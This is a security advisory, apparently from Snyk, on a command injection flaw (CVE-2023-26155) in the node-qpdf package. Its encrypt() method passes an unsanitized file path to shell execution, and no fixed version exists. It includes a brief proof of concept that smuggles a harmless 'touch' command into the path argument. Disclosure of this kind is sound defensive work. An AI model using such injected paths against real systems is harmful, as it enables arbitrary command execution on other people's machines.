Improper Neutralization of Special Elements used in a Command Affecting node-qpdf package, versions *


Severity

Recommended
0.0
high
0
10

CVSS assessment made by Snyk's Security Team. Learn more

Threat Intelligence

Exploit Maturity
Proof of concept
EPSS
0.18% (57th percentile)

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications

Snyk Learn

Learn about Improper Neutralization of Special Elements used in a Command vulnerabilities in an interactive lesson.

Start learning
  • Snyk IDSNYK-JS-NODEQPDF-5747918
  • published13 Oct 2023
  • disclosed30 Jun 2023
  • creditXiao Feng

Introduced: 30 Jun 2023

CVE-2023-26155  (opens in a new tab)
CWE-77  (opens in a new tab)

How to fix?

There is no fixed version for node-qpdf.

Overview

node-qpdf is an A Content Preserving transformations on PDFs wrapped around QPDF

Affected versions of this package are vulnerable to Improper Neutralization of Special Elements used in a Command such that the package-exported method encrypt() fails to sanitize its parameter input, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they can specify the input pdf file path.

PoC

var qpdf = require('node-qpdf');

var options = {
    keyLength: 128,
    password: 'YOUR_PASSWORD_TO_ENCRYPT'
}

qpdf.encrypt('test.pdf ||touch rce||', options); // a file named rce will be created

References

CVSS Scores

version 3.1